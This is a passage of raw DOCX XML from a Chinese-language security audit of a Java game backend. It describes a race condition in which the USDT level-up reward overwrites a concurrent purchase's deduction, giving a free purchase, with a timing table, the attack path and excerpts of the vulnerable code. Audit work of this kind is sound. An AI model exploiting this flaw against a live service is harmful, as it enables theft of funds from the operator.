          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>(user_id, slot_id, in_storage)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 加唯一约束，依赖数据库唯一索引在并发写入时抛出异常并回滚，确保坑位占用的原子性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&gt; 📎 该 sink 另有 2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受影响调用链（3 条）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="327"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MinerController.java.purchase → MinerService.java.purchase → MinerService.java.canPlaceInSlot → MinerService.java.isSlotUnlocked</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="328"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MinerController.java.purchase → MinerService.java.purchase → MinerService.java.getBuyPrice → MinerService.java.isSlotUnlocked</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="329"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MinerController.java.purchase → MinerService.java.purchase → MinerService.java.recalcUserLevelAndHashRate → MinerService.java.grantUsdtOnLevelUp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audit_m146_516_purchase_ctrl-path6of11.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m146_524_purchase_ctrl-path8of11.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m146_530_purchase_ctrl-path9of11.md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：MinerService.java#grantUsdtOnLevelUp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_17" w:id="17"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞16：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>grantUsdtOnLevelUp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> UserAccount 读-改-写无行锁，并发竞态导致 USDT 余额 Lost Update</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="33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：矿机合成升级奖励 — UserAccount 并发写入 Lost Update，可致 USDT 扣款被覆盖（等效免费购买）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="33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src/main/java/com/gameBack/mjservice/service/MinerService.java:grantUsdtOnLevelUp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="33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：资金安全（并发竞态 / Lost Update）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="33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33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numPr>
          <w:numId w:val="33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grantUsdtOnLevelUp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>recalcUserLevelAndHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>User</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 行锁（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByIdForUpdate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">）保护范围内被调用，但该方法读取 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UserAccount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（持有 USDT 余额）时既未使用悲观锁（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SELECT ... FOR UPDATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">），也没有 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>@Version</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 乐观锁字段。代码中的注释已明确承认并发设计缺陷：</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"须在 recalc 的 User 行锁内调用，勿再锁 account 以免与 purchase 死锁"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>此注释直接确认两点：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="336"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UserAccount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 行在合成事务中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>故意不加锁</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="337"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">并发的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>purchase</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 等操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>直接修改 UserAccount 而不持有 User 行锁</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>在 InnoDB READ COMMITTED 隔离级别下，竞态窗口如下：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T1（合成/升级，持有 User 行锁）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T2（购买，无 User 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t₀</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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 读 balance = </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:b w:val="true"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>B₀</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> ←</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t₁</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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 读 balance = </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:b w:val="true"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>B₀</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t₂</w:t>
            </w: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save(B₀ - cost)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> → </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:b w:val="true"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>commit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t₃</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save(B₀ + reward)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> → </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:b w:val="true"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>commit</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> ← </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:b w:val="true"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>覆盖 T2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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 xml:space="preserve">T1 在 t₀ 记录 B₀，在 t₃ 写入 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>B₀ + reward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>完全覆盖</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> T2 已提交的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>B₀ - cost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">。最终账户余额变为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>B₀ + reward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，T2 的扣款消失——用户同时获得购买商品与完整升级 USDT 奖励，等效于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>免费购买</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竞态窗口可控性分析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="338"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">T1 持有 User 行锁，整个 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>grantUsdtOnLevelUp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 执行期间事务未提交，持续时间包含多次 DB 查询（usdtLevelConfigRepository 按等级循环查询）和最终 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>save</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>窗口相对较宽</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="339"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>T2（purchase）不持有 User 锁，可快速读取 UserAccount → 扣款 → 提交，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>极易落入 T1 的竞态窗口</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="340"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>攻击者可自动化并发脚本在每次矿机合成升级时反复尝试，统计上高概率命中</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="34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入口 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>POST /api/miner/synthesize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（TokenAuthFilter 校验 Bearer Token，userId 来自 Token，不可伪造）→ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MinerController.synthesize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 透传 slotA/slotB → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MinerService.synthesize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（按升序对两个矿机坑位加 FOR UPDATE 行锁，校验等级相同，删旧建新）→ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>recalcUserLevelAndHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（自调用，AOP 代理被绕过，在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>synthesize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的同一事务内运行；读全量矿机算 maxLevel；对 User 行加 FOR UPDATE；若 userNewLevel &gt; oldLevel）→ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>grantUsdtOnLevelUp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>此处是漏洞 sink</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：读 UserAccount 无锁 → 累加 USDT → save 无版本校验）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="34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：每次成功竞态等值于一次购买扣款金额的 USDT 凭空保留；升级奖励也同时正常到账。如果某等级奖励 USDT 较大，或攻击者在连续多级跳升时并发多个购买请求，单次攻击收益可观。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>❌ 存在漏洞的代码（完整调用链关键片段）：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@PostMapping("/synthesize")</w:t>
              <w:br/>
              <w:t>public ApiResponse&lt;UserMiner&gt; synthesize(@CurrentUserId Long userId,   // ← userId 来自 Token，不可伪造</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                          @RequestBody @Valid SynthesizeForm form) { // ← slotA/slotB 攻击者可控</w:t>
              <w:br/>
              <w:t xml:space="preserve">    UserMiner miner = minerService.synthesize(userId, form.getSlotA(), form.getSlotB()); // ← 污点传入 service</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return ApiResponse.success(miner);</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② MinerService.java — synthesize（@Transactional，开启事务 T1）</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public UserMiner synthesize(Long userId, Integer slotA, Integer slotB) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    UserMiner lockedFirst = userMinerRepository</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .findByUserIdAndSlotIdAndInStorageForUpdate(userId, lockFirst, 0)   // ← 矿机行锁（正确）</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .orElseThrow(...);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    UserMiner lockedSecond = userMinerRepository</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .findByUserIdAndSlotIdAndInStorageForUpdate(userId, lockSecond, 0)  // ← 矿机行锁（正确）</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .orElseThrow(...);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userMinerRepository.delete(minerA);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userMinerRepository.delete(minerB);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userMinerRepository.save(merged);                           // ← 新矿机入库</w:t>
              <w:br/>
              <w:t xml:space="preserve">    recalcUserLevelAndHashRate(userId);                         // ← this 自调用，绕过 AOP 代理，在 T1 同事务内执行</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ③ MinerService.java — recalcUserLevelAndHashRate（在 T1 同一事务内）</w:t>
